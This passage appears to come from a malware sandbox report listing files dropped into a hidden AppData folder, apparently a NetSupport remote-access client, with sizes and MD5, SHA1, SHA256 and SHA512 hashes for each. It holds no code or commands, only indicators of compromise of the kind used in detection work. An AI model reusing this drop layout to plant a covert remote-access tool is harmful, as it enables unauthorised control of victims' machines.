edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\NSM.LIC

Filesize
257B

MD5
390c964070626a64888d385c514f568e

SHA1
a556209655dcb5e939fd404f57d199f2bb6da9b3

SHA256
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54

SHA512
f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\PCICL32.DLL

Filesize
3.6MB

MD5
00587238d16012152c2e951a087f2cc9

SHA1
c4e27a43075ce993ff6bb033360af386b2fc58ff

SHA256
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

SHA512
637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\client32.exe

Filesize
117KB

MD5
ee75b57b9300aab96530503bfae8a2f2

SHA1
98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

SHA256
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

SHA512
660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\client32.ini

Filesize
647B

MD5
8c978a6d8f380d59c9db4afe06218b89

SHA1
1fa286e91c8aa0eeb99276af72d40e02d2148c51

SHA256
d8c2b28ff9f90626f7e669b4fbdb45ed553a3cb1a980e23fdfea4fbbdddfc502

SHA512
b74539ae7fc88756c1e1404814d33197cd8709aaddf2c43167f2cf157e947c2cabad759414038dbe5e83b201786052e94ab53bd97bb4de68744f514f8ae7f552

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\svHAPn\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
memory/4808-62-0x0000019473550000-0x0000019473572000-memory.dmp

Filesize
136KB

Download